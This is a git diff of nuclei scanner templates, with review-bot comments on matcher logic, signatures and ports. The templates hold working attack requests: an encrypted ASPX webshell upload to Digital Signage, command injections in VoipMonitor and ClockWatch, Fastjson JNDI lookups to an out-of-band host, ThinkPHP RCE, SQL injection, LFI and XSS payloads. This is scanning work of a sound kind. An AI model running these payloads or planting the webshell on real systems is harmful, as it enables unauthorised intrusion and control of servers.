a/poc/php/nuuo-nvrmini2-upgradehandlephp-rce.yaml +++ b/poc/php/nuuo-nvrmini2-upgradehandlephp-rce.yaml @@ -3,8 +3,8 @@ info: name: NUUO NVRmini 2 3.0.8 - Remote Code Execution author: berkdusunur severity: critical - tags: rce - reference: | + tags: rce,nuuo + reference: - https://www.exploit-db.com/exploits/45070 - https://github.com/berkdsnr/NUUO-NVRMINI-RCE - https://packetstormsecurity.com/files/151573/NUUO-NVRmini-upgrade_handle.php-Remote-Command-Execution.html diff --git a/poc/php/php-fpm-status.yaml b/poc/php/php-fpm-status.yaml index baedf3cbee..1d1eb52ad1 100644 
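Review bot: In `zuul-panel-11843.yaml`, the second word matcher now lists the bare words `name`, `projects` and `queue` with no `condition`. Word matchers default to `or`, and the matchers themselves are OR-ed, so any response containing the string `name` is reported as a Zuul panel. The old side required the JSON keys `'"name":'`, `'"projects":'` and `'"queue":'` with `condition: and` and `part: body`; restore the quoted keys and add `condition: and` under that matcher. Replacing `host-redirects: true` / `max-redirects: 2` with `redirects: true` / `max-redirects: 5` also allows following redirects to other hosts, which can attribute a match to the wrong asset.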
--- a/poc/php/php-fpm-status.yaml +++ b/poc/php/php-fpm-status.yaml @@ -1,13 +1,16 @@ id: php-fpm-status + info: name: PHP-FPM Status author: geeknik severity: info tags: config + requests: - method: GET path: - "{{BaseURL}}/status?full" + matchers-condition: and matchers: - type: word diff --git a/poc/php/php-proxy-detect-9544.yaml b/poc/php/php-proxy-detect-9544.yaml index 16d49d2f3b..3978ef9413 100644 --- a/poc/php/php-proxy-detect-9544.yaml +++ b/poc/php/php-proxy-detect-9544.yaml @@ -1,26 +1,35 @@ id: php-proxy-detect + info: name: PHP Proxy Detect author: pikpikcu severity: info + metadata: + max-request: 2 tags: tech,php,proxy -requests: + +http: - method: GET path: - "{{BaseURL}}" - "{{BaseURL}}/proxy" + matchers-condition: and matchers: - type: word part: body words: - "PHP-Proxy" + - type: status status: - 200 + extractors: - type: regex part: body group: 1 regex: - '' + +# digest: 490a0046304402207b3bef18d95acf42b957d883ee45f5b8190c3e65ec36d4396fc711b1475d80d8022047ca111f8d9b193176ee4cdfa87cba20bfc0236f15921cd92606afa3d93191e7:922c64590222798bb761d5b6d8e72950 diff --git a/poc/php/php-timeclock-xss-9553.yaml b/poc/php/php-timeclock-xss-9553.yaml index 4b06f97417..55686517b4 100644 --- a/poc/php/php-timeclock-xss-9553.yaml +++ b/poc/php/php-timeclock-xss-9553.yaml @@ -1,16 +1,18 @@ id: php-timeclock-xss + info: name: PHP Timeclock 1.04 XSS author: pikpikcu severity: medium description: PHP Timeclock version 1.04 (and prior) Cross-Site Scripting vulnerabilities - reference: - - https://www.exploit-db.com/exploits/49853 + reference: https://www.exploit-db.com/exploits/49853 tags: xss,php,timeclock + requests: - method: GET path: - "{{BaseURL}}/login.php/'%3E%3Csvg/onload=alert%60{{randstr}}%60%3E" + matchers-condition: and matchers: - type: status @@ -22,6 +24,7 @@ requests: - "PHP Timeclock Admin Login" part: body condition: and + - type: word words: - "text/html" 
diff --git a/poc/php/phpinfo-9517.yaml b/poc/php/phpinfo-9517.yaml index 3ace8f9693..32db6aac90 100644 --- a/poc/php/phpinfo-9517.yaml +++ b/poc/php/phpinfo-9517.yaml @@ -1,19 +1,15 @@ id: phpinfo-files info: name: phpinfo Disclosure - author: pdteam,daffainfo,meme-lord,dhiyaneshDK,wabafet - description: | - A "PHP Info" page was found. The output of the phpinfo() command can reveal detailed PHP environment information. - remediation: | - Remove PHP Info pages from publicly accessible sites, or restrict access to authorized users only. + author: bauthard severity: low - tags: config,exposure,phpinfo requests: - method: GET path: - "{{BaseURL}}/php.php" - "{{BaseURL}}/phpinfo.php" - "{{BaseURL}}/info.php" + - "{{BaseURL}}/_profiler/phpinfo" - "{{BaseURL}}/infophp.php" - "{{BaseURL}}/php_info.php" - "{{BaseURL}}/test.php" @@ -22,30 +18,9 @@ requests: - "{{BaseURL}}/pinfo.php" - "{{BaseURL}}/phpversion.php" - "{{BaseURL}}/time.php" - - "{{BaseURL}}/index.php" - - "{{BaseURL}}/temp.php" - - "{{BaseURL}}/old_phpinfo.php" - - "{{BaseURL}}/infos.php" - - "{{BaseURL}}/linusadmin-phpinfo.php" - - "{{BaseURL}}/php-info.php" - - "{{BaseURL}}/dashboard/phpinfo.php" - - "{{BaseURL}}/_profiler/phpinfo.php" - - "{{BaseURL}}/_profiler/phpinfo" - stop-at-first-match: true - matchers-condition: and matchers: - type: word - part: body words: - "PHP Extension" - "PHP Version" condition: and - - type: status - status: - - 200 - extractors: - - type: regex - part: body - group: 1 - regex: - - '>PHP Version <\/td>([0-9.]+)' diff --git a/poc/php/phpmyadmin-setup.yaml b/poc/php/phpmyadmin-setup.yaml index a501921661..2485003909 100644 --- a/poc/php/phpmyadmin-setup.yaml +++ b/poc/php/phpmyadmin-setup.yaml 
@@ -1,26 +1,17 @@ id: phpmyadmin-setup + info: - name: Publicly Accessible Phpmyadmin Setup - author: sheikhrishad + name: phpMyAdmin setup page + author: thevillagehacker severity: medium - tags: misc + tags: phpmyadmin + reference: https://hackerone.com/reports/297339 + requests: - method: GET path: - - "{{BaseURL}}/phpmyadmin/scripts/setup.php" - - "{{BaseURL}}/_phpmyadmin/scripts/setup.php" - - "{{BaseURL}}/forum/phpmyadmin/scripts/setup.php" - - "{{BaseURL}}/php/phpmyadmin/scripts/setup.php" - - "{{BaseURL}}/typo3/phpmyadmin/scripts/setup.php" - - "{{BaseURL}}/web/phpmyadmin/scripts/setup.php" - - "{{BaseURL}}/xampp/phpmyadmin/scripts/setup.php" - - "{{BaseURL}}/sysadmin/phpMyAdmin/scripts/setup.php" - stop-at-first-match: true - matchers-condition: and + - "{{BaseURL}}/phpmyadmin/setup/index.php" matchers: - type: word words: - - "You want to configure phpMyAdmin using web interface" - - type: status - status: - - 200 + - "phpMyAdmin setup" diff --git a/poc/php/phpunit.yaml b/poc/php/phpunit.yaml index 5a7c36ba61..0a6b8c40e7 100644 --- a/poc/php/phpunit.yaml +++ b/poc/php/phpunit.yaml @@ -1,16 +1,13 @@ id: phpunit - info: name: phpunit.xml file disclosure author: pikpikcu severity: info tags: exposure - requests: - method: GET path: - "{{BaseURL}}/phpunit.xml" - matchers-condition: and matchers: - type: word @@ -18,7 +15,6 @@ requests: - "" condition: and - - type: status status: - 200 diff --git a/poc/php/phpwiki-lfi-9567.yaml b/poc/php/phpwiki-lfi-9567.yaml index 8d310252a7..d48b733698 100644 --- a/poc/php/phpwiki-lfi-9567.yaml +++ b/poc/php/phpwiki-lfi-9567.yaml 
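Review bot: The only evidence behind this medium-severity result in `phpmyadmin-setup.yaml` is the words `phpMyAdmin setup` anywhere in the response, because the hunk removes `matchers-condition: and` and the `status: 200` matcher. An error page, a login redirect or documentation that quotes the phrase would be reported as an exposed setup page. Restore `matchers-condition: and` with a `- type: status` matcher for `200`, and set `part: body` on the word matcher. The path list also shrinks from eight install locations to `/phpmyadmin/setup/index.php` alone, so installs under other prefixes are no longer checked.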
@@ -1,23 +1,24 @@ id: phpwiki-lfi + info: - name: phpwiki 1.5.4 - Cross-Site Scripting/Local File Inclusion + name: phpwiki 1.5.4 - XSS / Local File Inclusion author: 0x_Akoko severity: high - description: phpwiki 1.5.4 is vulnerable to cross-site scripting and local file inclusion, and allows remote unauthenticated attackers to include and return the content of locally stored files via the 'index.php' endpoint. - reference: - - https://www.exploit-db.com/exploits/38027 - tags: phpwiki,lfi,xss + reference: https://www.exploit-db.com/exploits/38027 + tags: phpwiki,lfi + requests: - method: GET path: - "{{BaseURL}}/phpwiki/index.php/passwd" + matchers-condition: and matchers: + - type: regex regex: - "root:[x*]:0:0" + - type: status status: - 200 - -# Enhanced by mp on 2022/08/04 diff --git a/poc/php/ruijie-phpinfo-9951.yaml b/poc/php/ruijie-phpinfo-9951.yaml index 43375c6e21..75be404d8b 100644 --- a/poc/php/ruijie-phpinfo-9951.yaml +++ b/poc/php/ruijie-phpinfo-9951.yaml 
@@ -1,14 +1,23 @@ id: ruijie-phpinfo + info: - name: Ruijie Phpinfo + name: Ruijie Phpinfo Configuration - Detect author: pikpikcu severity: low - reference: https://github.com/PeiQi0/PeiQi-WIKI-POC/blob/PeiQi/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/%E9%94%90%E6%8D%B7/%E9%94%90%E6%8D%B7EG%E6%98%93%E7%BD%91%E5%85%B3%20phpinfo.view.php%20%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.md - tags: phpinfo,rujjie,config,exposure -requests: + description: Ruijie phpinfo configuration was detected. + classification: + cwe-id: CWE-200 + reference: + - https://github.com/PeiQi0/PeiQi-WIKI-POC/blob/PeiQi/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/%E9%94%90%E6%8D%B7/%E9%94%90%E6%8D%B7EG%E6%98%93%E7%BD%91%E5%85%B3%20phpinfo.view.php%20%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.md + tags: phpinfo,rujjie,config,exposure,ruijie + metadata: + max-request: 1 + +http: - method: GET path: - "{{BaseURL}}/tool/view/phpinfo.view.php" + matchers-condition: and matchers: - type: word @@ -16,6 +25,9 @@ requests: - "PHP Version" - "PHP Extension" condition: and + - type: status status: - 200 + +# Enhanced by cs on 2023/03/02 diff --git a/poc/php/thinkphp-5023-rce-10748.yaml b/poc/php/thinkphp-5023-rce-10748.yaml index 7f9bd46a05..1cda70e12f 100644 --- a/poc/php/thinkphp-5023-rce-10748.yaml +++ b/poc/php/thinkphp-5023-rce-10748.yaml 
@@ -1,32 +1,32 @@ -id: thinkphp-5023-rce +id: thinkphp-5023-rce -info: - name: ThinkPHP 5.0.23 RCE - author: dr_set - severity: critical - description: Thinkphp5 5.0(<5.0.24) Remote Code Execution. - reference: https://github.com/vulhub/vulhub/tree/0a0bc719f9a9ad5b27854e92bc4dfa17deea25b4/thinkphp/5.0.23-rce - tags: thinkphp,rce +info: + name: ThinkPHP 5.0.23 RCE + author: dr_set + severity: critical + description: Thinkphp5 5.0(<5.0.24) Remote Code Execution. + reference: https://github.com/vulhub/vulhub/tree/0a0bc719f9a9ad5b27854e92bc4dfa17deea25b4/thinkphp/5.0.23-rce + tags: thinkphp,rce -requests: - - method: POST - path: - - "{{BaseURL}}/index.php?s=captcha" - - headers: - Content-Type: application/x-www-form-urlencoded - - body: "_method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=1" - - matchers-condition: and - matchers: - - type: word - words: - - "PHP Extension" - - "PHP Version" - - "ThinkPHP" - condition: and - - - type: status - status: +requests: + - method: POST + path: + - "{{BaseURL}}/index.php?s=captcha" + + headers: + Content-Type: application/x-www-form-urlencoded + + body: "_method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=1" + + matchers-condition: and + matchers: + - type: word + words: + - "PHP Extension" + - "PHP Version" + - "ThinkPHP" + condition: and + + - type: status + status: - 200 \ No newline at end of file diff --git a/poc/php/twig-php-ssti.yaml b/poc/php/twig-php-ssti.yaml index f8e8e26d35..d21ecf6b44 100644 --- a/poc/php/twig-php-ssti.yaml +++ b/poc/php/twig-php-ssti.yaml @@ -1,9 +1,10 @@ id: twig-php-ssti + info: name: Twig PHP <2.4.4 template engine - SSTI author: madrobot severity: high - tags: php,ssti + requests: - method: GET path: diff --git a/poc/php/weiphp-sql-injection.yaml b/poc/php/weiphp-sql-injection.yaml index 8b0c9a5a1a..2b57dda7f7 100644 --- a/poc/php/weiphp-sql-injection.yaml +++ b/poc/php/weiphp-sql-injection.yaml 
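Review bot: The `twig-php-ssti.yaml` hunk deletes `tags: php,ssti` and puts nothing in its place, so the template can no longer be selected or excluded by tag. The `severity: high` check also still has no `description` or `reference`. I would keep `tags: php,ssti` and add a one-line description of what a match means for the operator. The `requests:` block continues outside the hunk.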
@@ -1,24 +1,28 @@ id: weiphp-sql-injection + info: name: WeiPHP 5.0 SQLI author: pikpikcu severity: high - reference: - - https://github.com/Y4er/Y4er.com/blob/15f49973707f9d526a059470a074cb6e38a0e1ba/content/post/weiphp-exp-sql.md - metadata: - verified: true - shodan-query: http.html:"WeiPHP5.0" + reference: https://github.com/Y4er/Y4er.com/blob/15f49973707f9d526a059470a074cb6e38a0e1ba/content/post/weiphp-exp-sql.md tags: weiphp,sql + requests: - method: POST path: - "{{BaseURL}}/public/index.php/home/index/bind_follow/?publicid=1&is_ajax=1&uid[0]=exp&uid[1]=)%20and%20updatexml(1,concat(0x7e,md5('999999'),0x7e),1)--+ " + headers: + Content-Type: application/x-www-form-urlencoded + matchers-condition: and matchers: + - type: word - part: body words: - "52c69e3a57331081823331c4e69d3f2" + part: body + condition: and + - type: status status: - 500 diff --git a/poc/php/wp-phpfreechat-xss.yaml b/poc/php/wp-phpfreechat-xss.yaml index f2e72f6d70..ef3aa1dea3 100644 --- a/poc/php/wp-phpfreechat-xss.yaml +++ b/poc/php/wp-phpfreechat-xss.yaml @@ -1,5 +1,4 @@ id: wp-phpfreechat-xss - info: name: WordPress Plugin PHPFreeChat - 'url' Reflected Cross-Site Scripting (XSS) author: daffainfo @@ -7,24 +6,20 @@ info: reference: - http://web.archive.org/web/20210120061848/https://www.securityfocus.com/bid/54332/info tags: wordpress,xss,wp-plugin - requests: - method: GET path: - '{{BaseURL}}/wp-content/plugins/phpfreechat/lib/csstidy-1.2/css_optimiser.php?url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - matchers-condition: and matchers: - type: word words: - "" part: body - - type: word part: header words: - text/html - - type: status status: - 200 diff --git a/poc/python/autobahn-python-detect-593.yaml b/poc/python/autobahn-python-detect-593.yaml index 5697bfc546..3a6054cc5a 100644 --- a/poc/python/autobahn-python-detect-593.yaml +++ b/poc/python/autobahn-python-detect-593.yaml 
@@ -4,12 +4,10 @@ info: name: Autobahn-Python Webserver Detect author: pussycat0x severity: info - metadata: - max-request: 1 - shodan-query: "AutobahnPython" + reference: https://www.shodan.io/search?query=%22AutobahnPython%22 tags: tech,webserver -http: +requests: - method: GET path: - '{{BaseURL}}' @@ -29,5 +27,3 @@ http: part: body regex: - 'AutobahnPython([ 0-9.]+)' - -# digest: 4a0a004730450220299433f7a72c6c61f07be31feb69fbd48adc66cd0448767c424a96c597a762f7022100cc56d7af729b231f58beaee35f874d397f81497e67985ffb7c2d9c1f74131a56:922c64590222798bb761d5b6d8e72950 diff --git a/poc/python/default-django-page-6841.yaml b/poc/python/default-django-page-6841.yaml index 450d7e265c..cf3cf5a7f7 100644 --- a/poc/python/default-django-page-6841.yaml +++ b/poc/python/default-django-page-6841.yaml @@ -3,8 +3,8 @@ info: name: Django Default Page author: dhiyaneshDk severity: info - reference: - - https://www.shodan.io/search?query=http.title%3A%22The+install+worked+successfully%21+Congratulations%21%22 + metadata: + shodan-query: http.title:"The install worked successfully! Congratulations!" tags: tech,django requests: - method: GET diff --git a/poc/python/django-secret.key.yaml b/poc/python/django-secret.key.yaml index d682cce94f..8ec28a5f5e 100644 --- a/poc/python/django-secret.key.yaml +++ b/poc/python/django-secret.key.yaml 
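Review bot: The `autobahn-python-detect-593.yaml` hunks replace the `http:` key with the legacy `requests:` key, and the second hunk deletes the trailing `# digest:` line, which nuclei uses as the template signature, so the file can no longer be verified against a signer. If the content has to differ from the signed version, it should be re-signed with this repository's own key rather than shipped unsigned, and `http:` should stay. The same digest removal appears in the `django-secret.key.yaml` hunk, and the same `http:` to `requests:` downgrade appears in `fastjson-1-2-67-rce-7424.yaml`, `rconfig-rce.yaml` and `sangfor-edr-rce-10030.yaml`. The first hunk also trades the `shodan-query` metadata for a search URL under `reference`, which tooling that reads `metadata` will not pick up.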
@@ -1,62 +1,31 @@ id: django-secret-key info: - name: Django Secret Key Exposure - author: geeknik,DhiyaneshDk + name: Django Secret Key + author: geeknik severity: high - description: | - The Django settings.py file containing a secret key was discovered. An attacker may use the secret key to bypass many security mechanisms and potentially obtain other sensitive configuration information (such as database password) from the settings file. - reference: https://docs.gitguardian.com/secrets-detection/detectors/specifics/django_secret_key - metadata: - verified: true - max-request: 7 - shodan-query: html:settings.py - comments: 'This template downloads the manage.py file to check whether it contains line such as: `os.environ.setdefault("DJANGO_SETTINGS_MODULE", "APP_NAME.settings")` if it does, we extract the APP_NAME to know in what folder to look for the settings.py file.' - tags: django,exposure,files + tags: django -http: +requests: - method: GET path: - - "{{BaseURL}}/manage.py" - "{{BaseURL}}/settings.py" - "{{BaseURL}}/app/settings.py" - "{{BaseURL}}/django/settings.py" - "{{BaseURL}}/settings/settings.py" - "{{BaseURL}}/web/settings/settings.py" - - "{{BaseURL}}/{{app_name}}/settings.py" - - stop-at-first-match: true matchers-condition: and matchers: + - type: status + status: + - 200 - type: word part: body words: - "SECRET_KEY =" - - type: word part: header words: - "text/html" negative: true - - - type: status - status: - - 200 - - extractors: - - type: regex - part: body - group: 1 - regex: - - '"DJANGO_SECRET_KEY", "(.*)"' - - - type: regex - part: body - internal: true - name: app_name - group: 1 - regex: - - "os.environ.setdefault\\([\"']DJANGO_SETTINGS_MODULE[\"'],\\s[\"']([a-zA-Z-_0-9]*).settings[\"']\\)" - -# digest: 4a0a00473045022100b9f99aa21141aff5a2e32d9d17a38a880455bee51e9d5cb86222bbadac6086b402203b18b6d4563233114ccc027031dd1a9e01f8d491147509d60836f496edee6d8b:922c64590222798bb761d5b6d8e72950 
diff --git a/poc/python/python-metrics.yaml b/poc/python/python-metrics.yaml index 6f69f8e072..0236e8b8eb 100644 --- a/poc/python/python-metrics.yaml +++ b/poc/python/python-metrics.yaml @@ -4,10 +4,10 @@ info: author: dhiyaneshDK severity: low description: Information Disclosure of Garbage Collection - tags: exposure,devops,python reference: - https://www.shodan.io/search?query=html%3A%22python_gc_objects_collected_total%22 - https://gist.github.com/ruanbekker/e5b1e7895f62b020ff29b5f40767190c + tags: exposure,devops,python requests: - method: GET path: diff --git a/poc/rabbitmq/rabbitmq-dashboard.yaml b/poc/rabbitmq/rabbitmq-dashboard.yaml index b9add7a446..e881972648 100644 --- a/poc/rabbitmq/rabbitmq-dashboard.yaml +++ b/poc/rabbitmq/rabbitmq-dashboard.yaml @@ -1,10 +1,8 @@ id: rabbitmq-dashboard - info: name: RabbitMQ Dashboard author: fyoorer severity: info - requests: - method: GET path: diff --git a/poc/redis/exposed-redis-7337.yaml b/poc/redis/exposed-redis-7337.yaml index 166260adf7..825d612ae0 100644 --- a/poc/redis/exposed-redis-7337.yaml +++ b/poc/redis/exposed-redis-7337.yaml @@ -4,13 +4,13 @@ info: author: pdteam severity: high reference: https://redis.io/topics/security - tags: network,redis,unauth + tags: network,redis network: - inputs: - data: "info\r\nquit\r\n" host: - "{{Hostname}}" - - "{{Host}}:6379" + - "{{Hostname}}:6379" read-size: 2048 matchers-condition: and matchers: diff --git a/poc/remote_code_execution/Digital-Signage-rce.yaml b/poc/remote_code_execution/Digital-Signage-rce.yaml index c7eea0568a..aa759e322b 100644 --- a/poc/remote_code_execution/Digital-Signage-rce.yaml +++ b/poc/remote_code_execution/Digital-Signage-rce.yaml @@ -1,12 +1,10 @@ id: Digital-Signage-rce - info: name: Digital Signage 3.0.9 版本 QH.aspx 文件 远程代码执行漏洞 author: Str1am severity: critical reference: https://www.zeroscience.mk/codes/qhsignage_rce.txt tags: Digital,rce - requests: - raw: - | 
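Review bot: In the `exposed-redis-7337.yaml` hunk the second host entry changes from `{{Host}}:6379` to `{{Hostname}}:6379`, but `{{Hostname}}` already carries the port when the target was given with one. A target supplied as `host:port` therefore expands to `host:port:6379`, and the default Redis port is never probed. Keep `- "{{Host}}:6379"` for the fixed-port entry and `- "{{Hostname}}"` for the target as given. `clockwatch-enterprise-rce-1011.yaml` later in this patch makes the opposite change for port 1001, so the two network templates now disagree. Dropping `unauth` from `tags` also removes the template from tag-based selections for unauthenticated-service checks.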
@@ -17,22 +15,21 @@ requests: ------WebKitFormBoundaryhbcZX7o0Hw19h3kr Content-Disposition: form-data; name="fileToUpload"; filename="cmd.aspx" Content-Type: application/octet-stream - + <%@ Page Language="C#" %><%@Import Namespace="System.Reflection"%><%Session.Add("k","e45e329feb5d925b"); Encoding.Default.GetBytes(Session[0] + ""),c = Request.BinaryRead(Request.ContentLength);Assembly.Load(new System.Security.Cryptography.RijndaelManaged().CreateDecryptor(k, k).TransformFinalBlock(c, 0, c.Length)).CreateInstance("U").Equals(this);%> ------WebKitFormBoundaryhbcZX7o0Hw19h3kr Content-Disposition: form-data; name="action" - + upload ------WebKitFormBoundaryhbcZX7o0Hw19h3kr Content-Disposition: form-data; name="responderId" - + ResourceNewResponder ------WebKitFormBoundaryhbcZX7o0Hw19h3kr Content-Disposition: form-data; name="remotePath" - + /opt/resources ------WebKitFormBoundaryhbcZX7o0Hw19h3kr-- - matchers-condition: and matchers: - type: status @@ -43,4 +40,4 @@ requests: - "cmd.aspx" - "true" part: body - condition: and \ No newline at end of file + condition: and diff --git a/poc/remote_code_execution/SymfonyRCE.yaml b/poc/remote_code_execution/SymfonyRCE.yaml index d0de618202..c78dd48905 100644 --- a/poc/remote_code_execution/SymfonyRCE.yaml +++ b/poc/remote_code_execution/SymfonyRCE.yaml @@ -1,5 +1,4 @@ id: rce-symfony - info: name: symfony rce author: ELSFA7110 @@ -8,19 +7,16 @@ info: - https://www.acunetix.com/vulnerabilities/web/symfony-rce-via-weak-predictable-app_secret - https://www.ambionics.io/blog/symfony-secret-fragment tags: rce - requests: - method: GET path: - "{{BaseURL}}/_fragment?_path=_controller=phpcredits&flag=-1" - matchers-condition: and matchers: - type: word words: - "PHP Credits" part: body - - type: status status: - 200 diff --git a/poc/remote_code_execution/VOIPrce.yaml b/poc/remote_code_execution/VOIPrce.yaml index 3e99ae09d3..4f33512058 100644 --- a/poc/remote_code_execution/VOIPrce.yaml +++ b/poc/remote_code_execution/VOIPrce.yaml 
@@ -1,5 +1,4 @@ id: CVE-2021-30461 - info: name: VoipMonitor Pre-Auth-RCE author: nithissh @@ -7,7 +6,6 @@ info: description: A malicious actor can trigger Un authenticated Remote Code Execution using CVE-2021-30461. tags: cve,cve2021,rce,voipmonitor reference: https://ssd-disclosure.com/ssd-advisory-voipmonitor-unauth-rce/ - requests: - raw: - | @@ -21,7 +19,6 @@ requests: Content-Length: 35 SPOOLDIR=test".system(id)."&recheck=Recheck - matchers-condition: and matchers: - type: word @@ -32,7 +29,6 @@ requests: - "VoIPmonitor installation" part: body condition: and - - type: status status: - 200 diff --git a/poc/remote_code_execution/clockwatch-enterprise-rce-1011.yaml b/poc/remote_code_execution/clockwatch-enterprise-rce-1011.yaml index f3fd22042e..4a13aa1c66 100644 --- a/poc/remote_code_execution/clockwatch-enterprise-rce-1011.yaml +++ b/poc/remote_code_execution/clockwatch-enterprise-rce-1011.yaml @@ -1,19 +1,16 @@ id: clockwatch-enterprise-rce - info: name: ClockWatch Enterprise RCE author: gy741 severity: critical tags: clockwatch,rce,network reference: https://blog.grimm-co.com/2021/07/old-dog-same-tricks.html - network: - inputs: - data: "C+nslookup {{interactsh-url}}" - host: - "{{Hostname}}" - - "{{Hostname}}:1001" + - "{{Host}}:1001" matchers-condition: and matchers: - type: word diff --git a/poc/remote_code_execution/code42-log4j-rce.yaml b/poc/remote_code_execution/code42-log4j-rce.yaml index bbc3bd9189..31d6ae06ba 100644 --- a/poc/remote_code_execution/code42-log4j-rce.yaml +++ b/poc/remote_code_execution/code42-log4j-rce.yaml 
@@ -4,8 +4,7 @@ info: author: Adam Crosser severity: critical description: Remote code execution via log4j vulnerability - reference: - - https://support.code42.com/Terms_and_conditions/Code42_customer_support_resources/Code42_response_to_industry_security_incidents + reference: https://support.code42.com/Terms_and_conditions/Code42_customer_support_resources/Code42_response_to_industry_security_incidents classification: cve-id: CVE-2021-44228 tags: jndi,log4j,rce,cve,cve2021,oast,code42 diff --git a/poc/remote_code_execution/fastjson-1-2-42-rce-7408.yaml b/poc/remote_code_execution/fastjson-1-2-42-rce-7408.yaml index 6067f012d4..c50092689f 100644 --- a/poc/remote_code_execution/fastjson-1-2-42-rce-7408.yaml +++ b/poc/remote_code_execution/fastjson-1-2-42-rce-7408.yaml @@ -1,16 +1,11 @@ id: fastjson-1-2-42-rce info: - name: Fastjson 1.2.42 - Remote Code Execution + name: Fastjson 1.2.42 Deserialization RCE author: zh severity: critical - description: Fastjson 1.2.42 is susceptible to a deserialization remote code execution vulnerability reference: - https://github.com/tdtc7/qps/tree/4042cf76a969ccded5b30f0669f67c9e58d1cfd2/Fastjson - https://github.com/wyzxxz/fastjson_rce_tool - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 - cwe-id: CWE-77 tags: fastjson,rce,deserialization,oast requests: - raw: @@ -34,5 +29,3 @@ requests: negative: true status: - 200 - -# Enhanced by mp on 2022/05/25 diff --git a/poc/remote_code_execution/fastjson-1-2-47-rce.yaml b/poc/remote_code_execution/fastjson-1-2-47-rce.yaml index 2971ba72ad..0d9f24a329 100644 --- a/poc/remote_code_execution/fastjson-1-2-47-rce.yaml +++ b/poc/remote_code_execution/fastjson-1-2-47-rce.yaml 
@@ -1,18 +1,13 @@ id: fastjson-1-2-47-rce info: - name: Fastjson 1.2.47 - Remote Code Execution + name: Fastjson 1.2.47 Deserialization RCE author: zh severity: critical - description: Fastjson 1.2.47 is susceptible to a deserialization remote code execution vulnerability. reference: - https://github.com/vulhub/vulhub/tree/master/fastjson/1.2.47-rce - https://www.freebuf.com/vuls/208339.html - https://cert.360.cn/warning/detail?id=7240aeab581c6dc2c9c5350756079955 - https://github.com/wyzxxz/fastjson_rce_tool - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 - cwe-id: CWE-77 tags: fastjson,rce,deserialization,oast requests: - raw: @@ -43,5 +38,3 @@ requests: words: - "Bad Request" - "400" - -# Enhanced by mp on 2022/05/25 diff --git a/poc/remote_code_execution/fastjson-1-2-62-rce.yaml b/poc/remote_code_execution/fastjson-1-2-62-rce.yaml index 0b08215cde..7f16ccb998 100644 --- a/poc/remote_code_execution/fastjson-1-2-62-rce.yaml +++ b/poc/remote_code_execution/fastjson-1-2-62-rce.yaml @@ -1,17 +1,14 @@ id: fastjson-1-2-62-rce + info: - name: Fastjson 1.2.62 - Remote Code Execution + name: Fastjson 1.2.62 Deserialization RCE author: zh severity: critical - description: Fastjson 1.2.62 is susceptible to a deserialization remote code execution vulnerability. reference: - https://github.com/tdtc7/qps/tree/4042cf76a969ccded5b30f0669f67c9e58d1cfd2/Fastjson - https://github.com/wyzxxz/fastjson_rce_tool - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 - cwe-id: CWE-77 tags: fastjson,rce,deserialization,oast + requests: - raw: - | 
@@ -23,15 +20,15 @@ requests: "@type":"org.apache.xbean.propertyeditor.JndiConverter", "AsText":"rmi://{{interactsh-url}}/exploit" } + matchers-condition: and matchers: - type: word - part: interactsh_protocol # Confirms DNS Interaction + part: interactsh_protocol # Confirms DNS Interaction words: - "dns" + - type: status negative: true status: - - 200 - -# Enhanced by mp on 2022/05/25 + - 200 \ No newline at end of file diff --git a/poc/remote_code_execution/fastjson-1-2-67-rce-7424.yaml b/poc/remote_code_execution/fastjson-1-2-67-rce-7424.yaml index 9798de3adc..49fa7d3d12 100644 --- a/poc/remote_code_execution/fastjson-1-2-67-rce-7424.yaml +++ b/poc/remote_code_execution/fastjson-1-2-67-rce-7424.yaml @@ -1,22 +1,13 @@ id: fastjson-1-2-67-rce - info: - name: Fastjson 1.2.67 - Remote Code Execution + name: Fastjson 1.2.67 Deserialization RCE author: zh severity: critical - description: Fastjson 1.2.67 is susceptible to a remote code execution vulnerability. reference: - https://github.com/tdtc7/qps/tree/4042cf76a969ccded5b30f0669f67c9e58d1cfd2/Fastjson - https://github.com/wyzxxz/fastjson_rce_tool - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 - cwe-id: CWE-77 tags: fastjson,rce,deserialization,oast - metadata: - max-request: 1 - -http: +requests: - raw: - | POST / HTTP/1.1 @@ -30,17 +21,13 @@ http: "UserTransaction":"rmi://{{interactsh-url}}/Exploit" } } - matchers-condition: and matchers: - type: word - part: interactsh_protocol # Confirms DNS Interaction + part: interactsh_protocol # Confirms DNS Interaction words: - "dns" - - type: status negative: true status: - 200 - -# Enhanced by mp on 2022/05/25 diff --git a/poc/remote_code_execution/fastjson1_2_47-rce-Deserialization.yaml b/poc/remote_code_execution/fastjson1_2_47-rce-Deserialization.yaml old mode 100755 new mode 100644 
